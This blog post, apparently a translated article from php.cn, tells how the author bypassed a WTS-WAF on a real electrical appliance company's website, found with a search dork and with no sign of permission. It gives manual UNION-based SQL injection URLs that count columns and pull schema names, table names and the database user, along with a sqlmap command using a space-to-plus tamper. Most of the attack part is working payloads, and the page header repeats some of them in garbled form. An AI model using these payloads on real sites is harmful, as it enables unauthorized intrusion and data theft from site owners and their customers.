How to conduct analysis to bypass WTS-WAF-Safety-php.cn

Table of Contents

inurl:.php?id= intext:电器

Copy after login

" >

inurl:.php?id= intext:电器

Copy after login

http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1

Copy after login

" >

http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1

Copy after login

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1

Copy after login

" >

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1

Copy after login

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,字段名,9,10,11,12,13,14+表名+limit+0,1

Copy after login

" >

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,字段名,9,10,11,12,13,14+表名+limit+0,1

Copy after login

Home

Operation and Maintenance

Safety

How to conduct analysis to bypass WTS-WAF

王林

May 13, 2023 am 09:40 AM

waf wts

##0x01.Looking for the targetI found the website of an electrical appliance company, and tested it casually, and found that there is waf

How to conduct analysis to bypass WTS-WAF

This has not been arranged yet (I found some information, it seems that just adding a sign instead of a space is enough, try it directly)

0x02.Operation

How to conduct analysis to bypass WTS-WAF

It was found that there is no waf interception

The information also said that

sqlmap.py -u http://*/*.php?id=29 --tables --tamper space2plus.py

Copy after login

I tried the tool and found that it could not be started.

That’s it...

How to conduct analysis to bypass WTS-WAF

0x03.Hand Note

http://*/*.php?id=1+and+1=1  #回显正常
http://*/*.php?id=1+and+1=2  #回显错误
说明存在注入

http://*/*.php?id=1+order+by+15  #15回显错误
http://*/*.php?id=1+order+by+14  #14回显正常
说明有14个字段

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14  #-1让它错误然后执行后面

Copy after login

How to conduct analysis to bypass WTS-WAF

It echoed the 2nd and 8th

http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(),9,10,11,12,13,14  #查询当前数据库信息和当前用户
一些常见的函数
version()  #显示数据库当前版本
database() / schema()  #显示当前数据库名
user() / system_user() / session_user() / current_user() / current_user()  #显示当前用户名称
charset(str)  #返回字符串str的字符集
collation(str)  #返回字符串str的字符排列方式

Copy after login

0x04.Check data

Explosion database

How to conduct analysis to bypass WTS-WAF

它不能group_concat,那我就一个一个查了！
http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1 #从1开始取一个
http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+1,1  #从2开始取一个

Copy after login

Explosive data table

How to conduct analysis to bypass WTS-WAF

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1

Copy after login

Explosive data

Summary:
1. If the tool cannot run, it can only be done by hand Note
2. Practice the manual note of mysql

The above is the detailed content of How to conduct analysis to bypass WTS-WAF. For more information, please follow other related articles on the PHP Chinese website!

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn